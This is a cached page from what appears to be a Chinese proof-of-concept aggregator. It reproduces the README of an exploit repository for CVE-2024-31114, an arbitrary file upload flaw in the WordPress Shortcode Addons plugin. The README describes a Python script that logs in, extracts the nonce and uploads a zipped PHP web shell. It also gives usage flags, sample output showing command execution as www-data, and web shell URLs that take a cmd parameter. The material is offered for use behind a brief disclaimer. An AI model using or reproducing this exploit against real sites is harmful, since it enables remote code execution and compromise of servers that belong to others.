POC详情: 1c7573d2eaa001a3272ea1e5512608a44094aa45

来源
https://github.com/Nxploited/CVE-2024-31114
关联漏洞
标题: WordPress Plugin Shortcode Addons 代码问题漏洞 (CVE-2024-31114)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin Shortcode Addons 存在代码问题漏洞,该漏洞源于存在不受限制的危险文件类型上传。
描述
Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
介绍
# CVE-2024-31114 - WordPress Shortcode Addons RCE Exploit

**Shortcode Addons <= 3.2.5 – Authenticated (Admin+) Arbitrary File Upload**  
**CVE ID:** CVE-2024-31114  
**CVSS Score:** 9.1 (Critical)  

---

## 🛠️ Vulnerability Description

The **Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension** plugin for WordPress is vulnerable to arbitrary file uploads due to **missing file type validation** in all versions **up to and including 3.2.5**.

This flaw allows **authenticated attackers with administrator-level access or higher** to upload arbitrary files to the server — which can lead to **Remote Code Execution (RCE).**

---

## 🚀 Script Description

This Python script automates exploitation of the vulnerability. It performs:

1. Disabling SSL verification
2. Logging in with given credentials
3. Extracting the CSRF token (`_wpnonce`)
4. Generating a PHP shell (`nxploit.php`)
5. Compressing and uploading it as a `.zip`
6. Confirming the upload and accessing the shell
7. Executing `whoami` on the target server

---

## 🧪 Usage

```bash
usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target URL (e.g. http://target.com)
  -un, --username USERNAME   WordPress Admin Username
  -p, --password PASSWORD    WordPress Admin Password
```

---

## 📤 Example Output

```
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.
```

---
## 🐚 Web Shell Usage

Once the payload is uploaded, you can execute system commands using the following format:

```
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
```

🔹 Example:

```
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
```

This will list the contents of the current directory on the server.


## ⚠️ Disclaimer

This tool is for **educational and authorized testing purposes only**.  
The author is **not responsible** for any misuse or damage caused by this script.

Use responsibly and only on systems you have explicit permission to test.

---
**By:** Nxploited | Khaled Alenazi
文件快照

 [4.0K]  /data/pocs/1c7573d2eaa001a3272ea1e5512608a44094aa45
├── [4.3K]  CVE-2024-31114.py
├── [1.1K]  LICENSE
└── [2.5K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。